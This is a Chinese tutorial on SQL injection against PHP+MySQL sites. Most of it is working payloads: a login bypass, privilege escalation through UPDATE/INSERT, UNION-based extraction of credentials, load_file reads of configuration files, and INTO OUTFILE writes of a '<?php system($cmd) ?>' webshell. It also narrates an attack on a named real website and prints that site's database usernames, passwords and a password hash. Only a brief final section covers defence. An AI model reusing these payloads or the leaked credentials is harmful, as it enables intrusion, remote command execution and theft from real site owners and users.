Php+Mysql注入攻击详解

Php+Mysql注入攻击详解

1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。

2.大概了解phpapache的配置,主要用到php.inihttpd.conf

而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式,即让safe_mode = On,还有一个就是返回php执行错误的display_errors 这会返回很多有用的信息,所以我们应该关闭之,

即让display_errorsoff 关闭错误显示后,php函数执行错误的信息将不会再显示给用户。

php的配置文件php.ini中还有一个非常重要的配置选项magic_quotes_gpc,高版本的默认都是magic_quotes_gpcOn,只有在原来的古董级的php中的

默认配置是magic_quotes_gpcOff,可是古董的东西也有人用的哦!

php.inimagic_quotes_gpcOn的时候会有什么情况发生哩,不用惊慌,天是塌不下来的啦!它只是把提交的变量中所有的 ' (单引号), (双引号), / (反斜线) 和 空字符会自动转为含有反斜线的转义字符,例如把’变成了/,/变成了//

就是这一点,让我们很不爽哦,很多时候我们对字符型的就只好说BYEBYE了,

但是不用气馁,我们还是会有好方法来对付它的,往下看咯!

php程序员之家

 

3.有一定的php语言基础和了解一些sql语句,这些都很简单,我们用到的东西很少,所以充电还来的及哦!

 

我们先来看看magic_quotes_gpcOff的时候我们能干些啥,然后我们再想办法搞一搞magic_quotes_gpcOn的情况哈

 

一:magic_quotes_gpcOff时的注入攻击

magic_quotes_gpcOff的情况虽然说很不安全,新版本默认也让

magic_quotes_gpcOn了,可是在很多服务器中我们还发现magic_quotes_gpcOff的情况,例如www.qichi.*

还有某些程序像vbb论坛就算你配置magic_quotes_gpcOn,它也会自动消除转义字符让我们有机可乘,所以说

magic_quotes_gpcOff的注入方式还是大有市场的。

 

下面我们将从语法,注入点 and 注入类型几个方面来详细讲解mysqlphp注入

 

A:MYSQL语法方面先

1。先讲一些mysql的基本语法,算是给没有好好学习的孩子补课了哦~_~

1select

SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]

select_expression,...

[INTO {OUTFILE | DUMPFILE} 'file_name' export_options]

[FROM table_references

[WHERE where_definition]

[GROUP BY col_name,...]

[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...] phperz.com

]

常用的就是这些,select_expression指想要检索的列,后面我们可以用where来限制条件,我们也可以用into outfileselect结果输出到文件中。当然我们也可以用select直接输出

例如

 

mysql> select 'a';

+---+

| a |

+---+

| a |

+---+

1 row in set (0.00 sec)

具体内容请看mysql中文手册7.12

下面说一些利用啦

看代码先

这段代码是用来搜索的哦

 

<form method=POST action=<? echo $PHP_SELF; ?>>

<input type=text name=search><br>

<input type=submit value=Search>

</form>

<?php

………

SELECT * FROM users WHERE username LIKE %$search% ORDER BY username

…….

?>

 

这里我们顺便说一下mysql中的通配符,’%’就是通配符,其它的通配符还有’*’和’_,其中" * "用来匹配字段名,而" % "用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线" _ ",它代表的意思和上面不同,是用来匹配任何单个的字符的。在上面的代码中我们用到了’*’表示返回的所有字段名,%$search%表示所有包含$search字符的内容。 phperz.com

 

我们如何注入哩?

哈哈,和asp里很相似

在表单里提交

Aabb% or 1=1 order by id#

注:#mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。

或许有人会问为什么要用or 11呢,看下面,

 

把提交的内容带入到sql语句中成为

 

SELECT * FROM users WHERE username LIKE %aabb% or 1=1 order by id# ORDER BY username

 

假如没有含有aabb的用户名,那么or 11使返回值仍为真,使能返回所有值

 

我们还可以这样

 

在表单里提交

% order by id#

或者

order by id#

带入sql语句中成了

SELECT * FROM users WHERE username LIKE % % order by id# ORDER BY username

SELECT * FROM users WHERE username LIKE %% order by id# ORDER BY username

当然了,内容全部返回。

列出所有用户了哟,没准连密码都出来哩。

这里就举个例子先,下面会有更精妙的select语句出现,select实际上几乎是无处不在的哦!

2)下面看update

Mysql中文手册里这么解释的:

www.phperz.com

 

UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,...

[WHERE where_definition]

UPDATE用新值更新现存表中行的列,SET子句指出哪个列要修改和他们应该被给定的值,WHERE子句,如果给出,指定哪个行应该被更新,否则所有行被更新。

详细内容去看mysql中文手册7.17节啦,在这里详细介绍的话会很罗嗦的哦。

由上可知update主要用于数据的更新,例如文章的修改,用户资料的修改,我们似乎更关心后者,因为......

看代码先哦

我们先给出表的结构,这样大家看的明白

CREATE TABLE users (

id int(10) NOT NULL auto_increment,

login varchar(25),

password varchar(25),

email varchar(30),

userlevel tinyint,

PRIMARY KEY (id)

)

其中userlevel表示等级,1为管理员,2为普通用户

<?php

//change.php

……

$sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'"

……

?>

Ok,我们开始注入了哦,在添email的地方我们添入

netsh@163.com,userlevel=1

php程序员站

 

sql语句执行的就是

UPDATE users SET password='youpass',

email='netsh@163.com,userlevel=1 WHERE id='youid

看看我们的userlevel就是1了,变成管理员了哟

哈哈,如此之爽,简直是居家旅行必备啊。

这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。列类型主要分为数字类型,日期和时间类型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入了(因为很少有提交时间变量的)。在下面我们会详细将这几种类型的注入方式哦!

 

3)下面轮到insert了,它已经等的不耐烦了,简直就像中午食堂里的学生们。

Php中文手册是这样教我们的:

INSERT [LOW_PRIORITY | DELAYED] [IGNORE]

[INTO] tbl_name [(col_name,...)]

VALUES (expression,...),(...),...

INSERT把新行插入到一个存在的表中,INSERT ... VALUES形式的语句基于明确指定的值插入行,INSERT ... SELECT形式插入从其他表选择的行,有多个值表的INSERT ... VALUES的形式在MySQL 3.22.5或以后版本中支持,col_name=expression语法在MySQL 3.22.10或以后版本中支持。

www~phperz~com

 

由此可见对于见不到后台的我们来说,insert主要就出现在注册的地方,或者有其它提交的地方地方也可以哦。

 

看看表的结构先

CREATE TABLE membres (

id varchar(15) NOT NULL default '',

login varchar(25),

password varchar(25),

email varchar(30),

userlevel tinyint,

PRIMARY KEY (id)

)

我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。

代码如下

<?php

//reg.php

……

$query = "INSERT INTO members VALUES('$id','$login','$pass','$email',2')" ;

……

?>

默认插入用户等级是2

现在我们构建注入语句了哦

还是在要我们输入email的地方输入:

netsh@163.com,1)#

sql语句执行时变成了:

INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com,1)#',?')

看我们一注册就是管理员了。

#号表示什么来着,不是忘了吧,晕了,这么快?

忘就忘了吧,下面再详细给你说说

 

2.下面说一说mysql中的注释,这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。

phperz.com

 

我们继续

phperz.com


 

 

相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。

Mysql3种注释句法

# 注射掉注释符后面的本行内容

-- 注射效果同#

/* ... */ 注释掉符号中间的部分

 

对于#号将是我们最常用的注释方法。

-- 号记得后面还得有一个空格才能起注释作用。

/**/ 我们一般只用前面的/*就够了,因为后面的我们想加也不行,是吧?

 

注意:在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。

为了大家深刻理解

这里我给大家来个例题

 

有如下的管理员信息表

 

CREATE TABLE alphaauthor (

Id tinyint(4) NOT NULL auto_increment,

UserName varchar(50) NOT NULL default '',

PASSWORD varchar(50) default NULL,

Name varchar(50) default NULL,

PRIMARY KEY (Id),

UNIQUE KEY Id (Id),

KEY Id_2 (Id)

)

 

<?php

//Login.php

……

$query="select * from alphaauthor where UserName='$username' and Password='$passwd'";

www.phperz.com

 

$result=mysql_query($query);

$data=mysql_fetch_array($result);

if ($data)

{

Echo “重要信息”;

}

Else

Echo “登陆失败”;

……

?>

 

我们在浏览器地址框直接输入

http://***/login.php?username=aor id=1 %23

%23转换成#

放到sql语句中

select * from alphaauthor where UserName='aor id=1 #' and Password='$passwd'

#号后面的都拜输入了,看看

这句话等价于

select * from alphaauthor where UserName='aor id=1

 

再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真

我们就直接登陆了,当然你也可以写

hppt://***/login.php?username=aor 11 %23

一样的啦

 

3.下面将要出场的是……

对了,就是这些显示系统信息的间谍们

 

VERSION() 返回数据库版本信息

DATABASE() 返回当前的数据库名字,如果没有当前的数据库,DATABASE()返回空字符串。

USER()

SYSTEM_USER()

SESSION_USER()

返回当前MySQL用户名 php程序员站

mysql> select user(),database(),version();

+----------------+------------+----------------+

| user() | database() | version() |

+----------------+------------+----------------+

| root@localhost | alpha | 5.0.0-alpha-nt |

+----------------+------------+----------------+

1 row in set (0.01 sec)

如图(1)所示,图不是很爽是不是?睁大你的大眼睛好好看哦

 

有时候很有用的哦,比如说你可以根据他的mysql版本看看他的mysql有没有什么溢出漏洞,没准我们就发现个好动东哈哈

 

4. 下面进入最重要的部分了,没睡觉的打起精神来,睡着了的醒一醒啦。

1select union select

还是php中文手册中讲的:

SELECT ... UNION [ALL] SELECT ... [UNION SELECT ...]

UNION MySQL 4.0.0 中被实现。

UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。

 

SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。

SELECT 命令是一个普通的选择命令,但是有下列的限制:

只有最后一个 SELECT 命令可以有 INTO OUTFILE www.phperz.com

 

需要注意的是union前后的select字段数相同,只有这样union函数才能发挥作用。如果字段数不等将返回

ERROR 1222 (21000): The used SELECT statements have a different number of columns 错误

晕咯,这样不好吧。咋半哩?

别急哈,急也没用的

例如:

已知alphadb表有11

我们

mysql> select * from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor;

如图(2

 

我们只slect10个数当然出错啦。

下面看

mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;

如图(3

 

我们看看id247中的数据先

mysql> select * from alphadb where id=347;

+-----+--------------------------------------------+-----------------

| id | title | content | importtime | author | accessing | addInto | type | showup | change_ubb | change_html |

+-----+--------------------------------------------+-----------------

| 347 | 利用adsutil.vbs+..--发表于黑客档案2004.6 | 发表于黑客x档案第6 | 2004 phperz~com

-03-28 11:50:50 | Alpha | 17 | Alpha | 2 | 1 | 1 | 1 |

+-----+--------------------------------------------+-----------------

1 row in set (0.00 sec)

我们看到,它的返回结果和

mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;

是相同的。

哦,大家或许会问,这样有什么用呢?

问的好。

Ok,继续试验

当我们输入一个不存在的id的时候

例如id=0,或者id=347 and 1<>1

再看看

mysql> select * from alphadb where id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;

如图(4

 

我们发现它把我们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。

哈哈,终于显示不一样了,可是这有什么用呢?

先不告诉你。

我们讲一个具体的例子先

http://localhost/site/display.php?id=347

看看图5

 

http://localhost/site/display.php?id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor phperz~com

结果如图6

 

下面我们用一幅图来总结一下union的用法如图7

 

Ok,知道怎么利用了不?不知道的话下面将会详细告诉你。

2LOAD_FILE

这个功能太强大了,这也是林.linx在上一个专题中提到的方法。虽然说过了,可我也不得不再提出来。

Load_file可以返回文件的内容,记得写全文件的路径和文件名称

Etc.

我们在mysql的命令行下输入

 

mysql> select load_file('c:/boot.ini');

效果如图(8

 

可是我们在网页中怎么搞呢?

我们可以结合union select使用

http://localhost/site/display.php?id=347%20and%201<;;>1%20union%20select%201,2,load_file('c:/apache/htdocs/site/lib/sql.inc'),4,5,6,7,8,9,10,11

这里的c:/apache/htdocs/site/lib/sql.inc并不是我的配置文件哦,:P

看仔细图9中的

 

看看,文件内容暴露无疑。

我们为什么要把load_file('c:/apache/htdocs/site/lib/sql.inc')放在3字段呢?我们前面提到列类型一共有那么三种,而原来图7中显示3的地方应该是显示文章内容,应该是字符型的,而load_file('c:/apache/htdocs/site/lib/sql.inc')也一定是字符型的,所以我们猜测放在3字段可以顺利显示。

www.phperz.com

 

其实还有很多好的利用方法,继续往下看哦!

3) select * from table into outfile'file.txt'

有啥用哩?

作用就是把表的内容写入文件,知道有多重要了吧,我们写个webshell吧,哈哈。

当然我们不只是导出表,我们还可以导出其它东西的哦,往下看啦。

假设有如下表

 

#

# 数据表的结构 `test`

#

 

CREATE TABLE test (

a text,

b text

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

 

#

# 导出下面的数据库内容 `test`

#

 

INSERT INTO test VALUES ('<?php system($cmd); ?>', NULL);

 

已知我的网站路径在C:/apache/htdocs/site/

好,看你表演哦,输入

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'C:/apache/htdocs/site/cmd.php'

意思就是把表里的a列内容导出到cmd.phpzhong phperz.com

看看cmd.php里的内容先

1 2 <?php system($cmd); ?> 0000-00-00 00:00:00 5 6 7 8 9 10 11

我们执行一下看看先

http://localhost/site/cmd.php?cmd=dir

如图(10)

 

 

哈哈,果然很爽哦!

4)下面给大家讲述LOAD DATA INFILE的故事

 

LOAD

 

 

正如我们期望的那样,他顺利执行了,我们得到我们想要的。

当然咯,我们也可以这样构造

http://localhost/site/admin/login.php?username=0x616C706861%23

sql语句变成:

select * from alphaAuthor where UserName=0x616C706861%23# and Password=''

我们再一次是成功者了。很有成就感吧,

 

或许你会问我们是否可以把#也放在char()

实际上char(97,108,112,104,97)相当于’alpha

注意是alpha上加引号,表示alpha字符串。

我们知道在mysql中如果执行

 

mysql> select * from dl_users where username=alpha;

ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'

看返回错误了。因为他会认为alpha是一个变量。所以我们得在alpha上加引号。

如下

mysql> select * from dl_users where username='alpha';

这样才是正确的。

如果你把#号也放到那里去了,就成了’alpha#

带入sql语句中

php程序员站

 

select * from dl_users where username='alpha#';

当然是什么也没有了,因为连alpha#这个用户都没有。

好,下面我们再来看个例子,

 

<?php

//display.php

……

$query="select * from ".$art_system_db_table['article']."

where type=$type;

……

?>

 

代码根据类型来显示内容,$type没有任何过滤,且没有加引号放入程序中。

假设type中含有xiaohua类,xiaohuachar()转换后是

char(120,105,97,111,104,117,97)

 

我们构建

http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor

带入sql语句中为:

select * from ".$art_system_db_table['article']."

where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor

phperz~com

 

看看,我们的用户名和密码照样出来了哦!没有截图,想像一下咯:P

 

2) 或许有人会问,在magic_quotes_gpcOn的情况下功能强大的load_file()还能不能用呢?

这正是我们下面要将的问题了,load_file()的使用格式是load_file(‘文件路径’)

我们发现只要把‘文件路径’转化成char()就可以了。试试看哦

load_file(c:/boot.ini)转化成

load_file(char(99,58,47,98,111,111,116,46,105,110,105))

22

 

放到具体注入里就是

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

看图23

 

看看,我们看到了boot.ini的内容了哦。

很可惜的是into outfile’’ 不能绕过,不然就更爽了。但是还是有一个地方可以使用select * from table into outfile’’ 那就是….(先卖个关子,下面会告诉你) www.phperz.com

三:一些注入技巧,很多都是个人发现哦

1.union select的技巧

UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。

然而有我们可以用下面的方法来猜测列的类型,可是省去很多时间

我们先

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

24

 

看看软件描述里写着3,作者里写着4,我们就可以猜测34的位置是字符型的,我们再看14前面的是下载次数,这就应该是int型的了,对吧。

好了,我们根据这里来构建吧,估计usernamepassword也是字符型的。

试试看哦

http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users

www~phperz~com

 

如图25

 

哈哈,这种方法只要看看就可以大概猜到了。

2.load_file读写文件的技巧

不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如:

'C:/apache/htdocs/site/lib/sql.inc.php'转化为16进制为:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870

我们构造如下

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11

如图26

 

发现在文章内容的地方本来该显示sql.inc.php的,可是却空空之,为何呢?

我们看看网页的源代码先

27

 

哈哈,看看标记的地方,晕死,原来在这里啊,可是为什么哩?

原来html< >用于标注,哈哈,明白了吧!下次可得记得在哪里找哦。

4. md5的恶梦

山东大学的王博士最近可是搞md5搞的红透了,我们也来搞一搞吧,我们比他更爽,不用计算,哈哈。

php程序员站

 

md5我们是有办法绕过的,但是并不是哪里都可以,php中的md5函数就不能绕过,因为你输入的所有东西都在里面,根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的,道理相同哦。

看例子先:

<?php

//login.php

……

$query="select * from alphaauthor where UserName=md5($username) and Password='".$Pw."'";

……

?>

我们直接在浏览器提交

http:/login.php?username=char(97,98)) or 1=1 %23

带入sql语句成为select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password='".$Pw."'

记得md5里面放的是字符,因为后面有or 1=2,所以我们随便放了个char(97,98). Ok,登陆成功了哦!看看,md5在我们面前也没有什么用处。

5. 核心技术,利用php+mysql注入漏洞直接写入webshell。。

直接利用注入得到webshell,这应该是大家都很想的吧,下面就教给你。

php程序员站

 

这里假设你已经知道了网站所在的物理路径,我这里假设网站路径为c:/apache/htdocs/site。网站的mysql连接信息放在/lib/sql.inc.php

1)适用于magic_quotes_gpcOff

假设我们可以上传图片,或者txtzip,等其它东西,我们把我们的木马改成

jpg后缀的,上传后路径为/upload/2004091201.jpg

2004091201.jpg中的内容为 <?php system($cmd) ?>

好,我们开http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('C:/apache/htdocs/site/upload/2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'C:/apache/htdocs/site/shell.php'

因为适用了outfile,所以网页显示不正常,但是我们的任务是完成了。

如图28

我们赶快去看http://localhost/site/shell.php?cmd=dir

如图29 phperz.com

 

爽否?Webshell我们已经创建成功了。看到最前面的12了没?那就是我们select 12所输出的!

2)下面再讲一个适用于magic_quotes_gpcOn的时候保存webshell的方法哦,显然肯定也能用在于magic_quotes_gpcOff的时候啦。

我们直接读他的配置文件,用技巧2介绍的方法

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11

得到sql.inc.php内容为

<?$connect=@mysql_connect("localhost","root","") or die("Unable to connect to SQL server");mysql_select_db("alpha",$connect) or die("Unable to select database");?>

好了我们知道了mysqlroot密码了,我们找到phpmyadmin的后台

http://localhost/phpmyadmin/ php程序员站

root密码为空登陆。

如图30

然后我们新建立一个表结构内容如下:

 

#

# 数据表的结构 `te`

#

CREATE TABLE te (

cmd text NOT NULL

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

 

#

# 导出下面的数据库内容 `te`

#

INSERT INTO te VALUES ('<?php system($cmd) ?>');

Ok,是我们用select * from table into outfile’’的时候了

直接在phpmyadminsql输入

SELECT * FROM `te` into outfile 'C:/apache/htdocs/site/cmd1.php';

如图31

 

Ok,成功执行,我们http://localhost/site/cmd1.php?cmd=dir看看效果去

如图32

 

好爽的一个webshell是吧!哈哈,我也很喜欢。

不过不知道大家有没有发现我们是在magic_quotes_gpcOn的情况下完成这项工作的,竟然在phpmyadmin里可以不用考虑引号的限制,哈哈,说明什么?说明phpmyadmin太伟大了,这也就是我们在谈magic_quotes_gpcOn绕过时所卖的那个关子啦!

php程序员站

 

6.发现没有我们还可以利用updateinsert来插入我们的数据,然后来得到我们的webshell哦,还用上面的那个例子,

<?php

//reg.php

……

$query = "INSERT INTO members

VALUES('$id','$login','$pass','$email',2')" ;

……

?>

我们在email的地方输入<?php system($cmd) ?>

假设我们注册后的id10

那么我们可以再找到一个可以注入的地方

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile'C:/apache/htdocs/site/test.php'

好了,我们又有了我们的wenshell了哦。

7.mysql的跨库查询

大家是不是一直听说mysql不能跨库查询啊,哈哈,今天我将要教大家一个好方法,通过这个方法来实现变相的跨库查询,方法就是通过load_file来直接读出mysqldata文件夹下的文件内容,从而实现变态跨库查询。

php程序员之家

 

举个例子啦

在这之前我们先讲一下mysqldata文件夹下的结构

Data文件夹下有按数据库名生成的文件夹,文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件,例如

Mysql中有alpha数据库,在alpha库中有alphaauthoralphadb两个表,

Alpha文件夹内容如下图33

 

其中alphadb.frm放着lphadb表中的数据,alphadb.frm放着表的结构,alphadb.myi中放的内容随mysql的版本不通会有所不同,具体可以自己用记事本打开来判断。

实验开始

假设我们知道有另外的一个数据库yminfo210存在,且存在表useruser中放这admin的信息。

我们

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210/user.myd'),4,5,6,7,8,9,10,11

说明一下,load_file默认所在的目录是mysql下的data目录,所以我们用

load_file('yminfo210/user.myd'),当然load_file('.info210/user.myd')也是一样的,注意的是into outfile的默认路径是在所在的数据库文件夹下。

 

 

我们看读出来的内容

? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answerhttp://www.yoursite.com (??KA?? 127.0.0.1 d|?? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?EAMA 127.0.0.1 222 222222223423

虽然乱码一堆,但是我们还是可以看出用户名是admin,密码是698d51a19d8a121ce581499d7b701668,后面其它的是另外的信息。

通过这种方法我们就实现了曲线跨库,下面的例子中也会提到哦!

 

说了这么多下面我们来具体的使用一次,这次测试的对象是国内一著名安全类站点――黑白网络

听人家说黑白有漏洞?我们一起去看看吧。

http://www.heibai.net/down/show.php?id=5403%20and%201=1

正常显示。

如图35

 

http://www.heibai.net/down/show.php?id=5403%20and%201=2

php程序员站

 

显示不正常。

如图36

 

好,我们继续

http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1

显示结果如下

如图37

 

注意看图中没有显示程序名,而且还附带了

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:/web/heibai/down/show.php on line 45

 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:/web/heibai/down/global.php on line 578

 

晕了,网站路径出来了,那可就死定了哦!

我们继续,直到我们猜到

http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 www~phperz~com

的时候正常显示了。

如图38

 

好我们转换语句成为

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

显示如图39

 

看看简介处显示为12,我们可以猜测此处应该为字符型!

Ok,我们下面看看文件内容先

D:/web/heibai/down/show.php转化成ascii后为

char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)

我们

view-sourcehttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19

www.phperz.com

 

view-source:是指察看源代码,至于为什么用,我们后面将讲到

显示出它的源代码

如图40

 

因为在show.php中有一句

<META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'>

如果我们直接在浏览器里提交会跳转到list.php

我们发现这句require ("./include/config.inc.php");

好东西,应该放这配置文件,ok继续

d:/web/heibai/down/include/config.inc.php

转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)

我们输入

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 phperz.com

显示结果如图41

 

里面内容主要有

…………………..

ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序

// ------------------------- -------- ------------------------- //

// 常规设置 //

// ------------------------- -------- ------------------------- //

 

 

// 数据库信息

$dbhost = "localhost"; // 数据库主机名

$dbuser = "download";// 数据库用户名

$dbpasswd = "kunstar988"; // 数据库密码

$dbname = "download"; // 数据库名

 

// Cookie 名称

$cookie_name = "heibai";

// 版本号

$version = "1.0.1";

 

// 数据表名

$down_table = ymdown;

$down_user_table = ymdown_user;

$down_sort1_table = ymdown_sort1;

$down_sort2_table = ymdown_sort2;

晕原来用的是夜猫的下载系统,而且我们知道了

$dbuser = "download";// 数据库用户名

$dbpasswd = "kunstar988"; // 数据库密码

php程序员站

 

说不定呆会有用哦。

用的表名是默认的表名,我们知道夜猫的管理员密码放在ymdown_user

我们继http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user

结果如图42

 

根据提示我们知道文件大小处的是username,应用平台处的是password(对照图36

username=dloadpassword6558428,夜猫的后台默认在admin目录下,我试验了很久都没有找到,晕之。

想直接连接mysql,发现telnet端口并没有开放。我们去看看别的吧!

http://www.heibai.net/vip/article/login.php

看起来像是会员的登陆哦,我们看看先

d:/web/heibai/vip/article/login.php

转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)

www~phperz~com

 

我们输入

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19

结果如图43

 

其中

require ("./include/global.php");

require ("./include/config.inc.php");

require ("./mainfunction.php");

require ("./function.php");

当然了,我们去看config.inc.php

d:/web/heibai/vip/article/include/config.inc.php

转成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)

输入

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 php程序员站

结果如图44

 

显示了很多好东西哦

 

$dbhost = "localhost"; // 数据库主机名

$dbuser = "root"; // 数据库用户名

$dbpass = "234ytr8ut"; // 数据库密码

$dbname = "article"; // 数据库名

$ymcms_user_table = "user";

$ymcms_usergroup_table = "usergroup";

$ymcms_userrace_table = "userrace";

表还是默认的表,而且出来了root的密码

要是能连上它的mysql该多好啊,那样我们就可以into outfile

痛苦的找了找phpmyadmin,没有找见,或许根本就没有用。

c:/winnt/php.ini发现

; Magic quotes

;

; Magic quotes for incoming GET/POST/Cookie data.

magic_quotes_gpc = On

55555555,痛苦中,我们看看能不能搞几个会员账号

猜测会员账号放在user表中,我们直接读dataarticle文件夹里的user.myd文件

Article/user.myd转换成

char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)

我们输入

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19

php程序员之家

 

结果如图45

 

晕了,竟然没有返回。我们来读Article/user.frm

http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19

结果如图46

 

晕了,表结构都在,而且读Article/user.myi时也成功,可是为什么Article/user.myd读不出来呢?要是magic_quotes_gpcOff我们还可以into outfile来看看,可是……

郁闷中,测试就这样结束吧,下面的工作还是留给你们来完成吧!

文中所述问题已经通知星坤了!

四:phpmysql注入的防范方法。

在上一期的专题里已经讲了很多的防范方法,这里我就主要讲一下php+mysql注射攻击的防范方法。

大家看到,在magic_quotes_gpcOn的时候,很多的注射攻击已经没有作用了。

我们可以利用这个来加固我们的程序。Addslashes()函数等同于magic_quotes_gpcOn,而且与magic_quotes_gpcOn也不冲突,我们可以这样过滤 phperz~com

$username = addslashes($username);

$query="SELECT * FROM users WHERE userid='$username'");

